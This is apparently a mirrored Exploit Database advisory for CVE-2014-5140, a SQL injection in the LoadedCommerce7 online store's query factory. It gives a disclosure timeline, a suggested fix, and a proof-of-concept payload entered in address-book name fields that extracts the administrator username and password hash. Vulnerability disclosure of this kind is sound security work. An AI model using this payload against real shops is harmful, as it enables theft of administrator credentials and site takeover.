LoadedCommerce7 – Systemic Query Factory

• Exploit Database
• 42 阅读

• 作者： Breaking.Technology
  日期： 2014-09-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34552/

• Title: LoadedCommerce7 Systemic Query Factory Vulnerability
  
  Advisory:http://breaking.technology/advisories/CVE-2014-5140.txt
  
  Credits: Discovered by Breaking Technology Research Labs 2014-06-30
  
  Reference: CVE-2014-5140 - Assigned 31 June 2014
  
  Timeline:
   Vendor notified - 29 July 2014
   Vendor confirmed exploit 30 July 2014
  
  
  Severity: Critical
  Attack Complexity:Minimal
  Classification: SQL injection, unsafe string replacement
  
  Description:
  
  	Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
  
  Proof of Concept:
  
  	Have a valid customer account and create a new contact in your address book using the following values.
  
  
  	First name: :entry_lastname,
  	Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
  
  	The new contact will be added to your address book with the admin hash as the contact's street address
  
  Suggested Fix:
  	Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value.A similar fix was issued for tomatocart, available at
  https://github.com/tomatocart/TomatoCart-v1/pull/238